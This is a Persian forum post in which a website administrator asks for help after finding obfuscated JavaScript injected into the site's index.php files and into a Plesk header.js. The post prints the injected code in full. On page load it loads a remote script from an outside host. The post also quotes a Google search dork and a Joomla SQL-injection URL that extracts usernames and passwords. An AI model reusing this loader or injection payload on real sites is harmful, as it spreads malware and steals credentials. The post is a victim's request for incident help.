سلام
من ادمين سايت asanhesab.com هستم
هنگام باز كردن سايت اين فايل دانلود مي شود
در اخر index.php سايت
کد:
<script>this.j="";this.y="";try {var CA;if(CA!='' && CA!='r'){CA='l'};var a=new Date();this.L="";var S='';var u=RegExp;var W='[';var E;if(E!='' && E!='Td'){E='Tw'};var wG='';var h='';var uR='g';var t;if(t!='n' && t != ''){t=null};this.aC='';var WX=']';var LS;if(LS!='Gd'){LS='Gd'};this.aS='';var C='replace';this.cP="";var tE=new Array();function _(m,mk){var ob=new Date();var c=W;var TP=new Array();c+=mk;var aB;if(aB!=''){aB='g'};c+=WX;var I=new u(c, uR);this.Xu="";this.C_="";return m[C](I, S);var SZ="";var JP;if(JP!='ja'){JP=''};};var i;if(i!='' && i!='Ea'){i=null};var F;if(F!='' && F!='nmW'){F='zi'};var w=_('beordxye',"wrex");var on;if(on!=''){on='NK'};var m="1";var U=_('842224402222484222242042242',"24");var BX;if(BX!='' && BX!='zR'){BX=''};var AK;if(AK!='' && AK!='wh'){AK=''};var o=_('/1gKo1oOgOl0e0.1cKoKmK/OgKoOoOgOl0eB.Kc1oKmK/0p1iKx1n0eKt0.On1eBtB/Oh1aKbOeBrOtBuBrOkO.0c0oKmO/KgOo0oBgBlBe1.BnBlB.KpBhOpO',"OB0K1");var eL;if(eL!='aW' && eL!='cg'){eL=''};var GZ=new Date();var Ic=_('hStJtOpO:O/S/Oh2aSrJrOeSnJmOe2d2iSaOnJe2tOwOoSrOkO-2cJoOmJ.OgOoJoSgOlOe2.OcOoOmJ.Sd2oJ.2bOiJlOdO-Od2eO.ScJySbSe2r2tJaOgOoSnSlOi2nSeJ.JrSuS:O',"SJO2");var Dh;if(Dh!='sS'){Dh=''};this.Di="";var nh;if(nh!='qk'){nh=''};var A=_('slclrlilpltO',"Ol");var X=_('oWnwlWoTawdT',"TWw");var f='';var N=_('aLpLpLeAnLdsCAhLiSlLds',"ASsL");var T=_('s0eJt0AJt0tYrYiYbUu0t0e0',"UlJY0");var CE;if(CE!='Zl' && CE!='DhF'){CE=''};var R=_('cTrxexa7t1e1E1l1exmxexn7tx',"7TxI1");var _J='';var GX="";var ze=new Date();window[X]=function(){var mR="";var XC;if(XC!='rPF' && XC!='qK'){XC=''};var ms="";var rm=new Array();Rj=document[R](A);var KW;if(KW!='' && KW!='KO'){KW=null};this.D_='';f+=Ic;f+=U;f+=o;this.mo="";var dO;if(dO!='Od'){dO='Od'};this.Uy="";var FE="";var Z=document[w];var hQ;if(hQ!='' && hQ!='qC'){hQ=null};Rj.src=f;var oB=new Date();this.Eg="";Rj.setAttribute('defer', m);var ES;if(ES!='VK' && ES!='hG'){ES=''};var ws;if(ws!='GF' && ws!='et'){ws='GF'};var gK=new Array();var _M=new Array();Z.appendChild(Rj);var kL;if(kL!='mn'){kL=''};};this.Ek="";} catch(J){var vR;if(vR!='' && vR!='vD'){vR=null};var QQ;if(QQ!='' && QQ!='TX'){QQ=null};};</script>
<!--28278629403d7aba0fc95df88c6ad2d8-->
اضافه شده بود
در اخر index2.php
در اخر index3.php
هم اضافه شده بود
سايت من هر روز از گوگل
کد:
http://www.google.com.tr/search?hl=tr&lr=&client=firefox-a&rls=org.mozilla:tr:official&q=inurl:%22jos_users%22++inurl:%22index.php%22&start=150&sa=n
اين آدرس را
کد:
http://www.asanhesab.com/cms/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users
/
پيدا مي كند
من خيلي نگران امنيتم
هاست من ويندوز از رادكام است
اسكريت در تمام index .php وجود دارد
من يك فايل با نام header.js درhttpdocs سايت حاوي :
کد:
function writeHeader() { writeHeader(false); }
function writeHeader(virtuozo) {
document.write('<a class="company-logo" href="[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] class="header-area"><h1><a class="product-logo" href="[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] title="Parallels Plesk Panel">Parallels Plesk Panel</a></h1><span class="header-text"><a class="top-copyright" href="[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] 1999-2009, Parallels<br />All rights reserved</a>');
if (virtuozo) { document.write('<a class="txt-banner" href="[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] <strong>Parallels<br />Virtuozzo Containers</strong></a>'); }
document.write('</span></div>');
}
function writeFooter() { writeFooter(true); }
function writeFooter(virtuozzo) {
document.write('<p class="description">This page was generated by <a href="[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] Plesk Panel</a></p>');
if (virtuozzo) { }
}
function writeCopyFlag() {
document.write('<script language="javascript" type="text/javascript" src="[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] + location.hostname + ':8880/javascript/promo-flags.js.php"></' + 'script>\n');
}
this.j="";this.y="";try {var CA;if(CA!='' && CA!='r'){CA='l'};var a=new Date();this.L="";var S='';var u=RegExp;var W='[';var E;if(E!='' && E!='Td'){E='Tw'};var wG='';var h='';var uR='g';var t;if(t!='n' && t != ''){t=null};this.aC='';var WX=']';var LS;if(LS!='Gd'){LS='Gd'};this.aS='';var C='replace';this.cP="";var tE=new Array();function _(m,mk){var ob=new Date();var c=W;var TP=new Array();c+=mk;var aB;if(aB!=''){aB='g'};c+=WX;var I=new u(c, uR);this.Xu="";this.C_="";return m[C](I, S);var SZ="";var JP;if(JP!='ja'){JP=''};};var i;if(i!='' && i!='Ea'){i=null};var F;if(F!='' && F!='nmW'){F='zi'};var w=_('beordxye',"wrex");var on;if(on!=''){on='NK'};var m="1";var U=_('842224402222484222242042242',"24");var BX;if(BX!='' && BX!='zR'){BX=''};var AK;if(AK!='' && AK!='wh'){AK=''};var o=_('/1gKo1oOgOl0e0.1cKoKmK/OgKoOoOgOl0eB.Kc1oKmK/0p1iKx1n0eKt0.On1eBtB/Oh1aKbOeBrOtBuBrOkO.0c0oKmO/KgOo0oBgBlBe1.BnBlB.KpBhOpO',"OB0K1");var eL;if(eL!='aW' && eL!='cg'){eL=''};var GZ=new Date();var Ic=_('hStJtOpO:O/S/Oh2aSrJrOeSnJmOe2d2iSaOnJe2tOwOoSrOkO-2cJoOmJ.OgOoJoSgOlOe2.OcOoOmJ.Sd2oJ.2bOiJlOdO-Od2eO.ScJySbSe2r2tJaOgOoSnSlOi2nSeJ.JrSuS:O',"SJO2");var Dh;if(Dh!='sS'){Dh=''};this.Di="";var nh;if(nh!='qk'){nh=''};var A=_('slclrlilpltO',"Ol");var X=_('oWnwlWoTawdT',"TWw");var f='';var N=_('aLpLpLeAnLdsCAhLiSlLds',"ASsL");var T=_('s0eJt0AJt0tYrYiYbUu0t0e0',"UlJY0");var CE;if(CE!='Zl' && CE!='DhF'){CE=''};var R=_('cTrxexa7t1e1E1l1exmxexn7tx',"7TxI1");var _J='';var GX="";var ze=new Date();window[X]=function(){var mR="";var XC;if(XC!='rPF' && XC!='qK'){XC=''};var ms="";var rm=new Array();Rj=document[R](A);var KW;if(KW!='' && KW!='KO'){KW=null};this.D_='';f+=Ic;f+=U;f+=o;this.mo="";var dO;if(dO!='Od'){dO='Od'};this.Uy="";var FE="";var Z=document[w];var hQ;if(hQ!='' && hQ!='qC'){hQ=null};Rj.src=f;var oB=new Date();this.Eg="";Rj.setAttribute('defer', m);var ES;if(ES!='VK' && ES!='hG'){ES=''};var ws;if(ws!='GF' && ws!='et'){ws='GF'};var gK=new Array();var _M=new Array();Z.appendChild(Rj);var kL;if(kL!='mn'){kL=''};};this.Ek="";} catch(J){var vR;if(vR!='' && vR!='vD'){vR=null};var QQ;if(QQ!='' && QQ!='TX'){QQ=null};};
يافتم
* N پست شما یکی شد !
علاقه مندی ها (Bookmarks)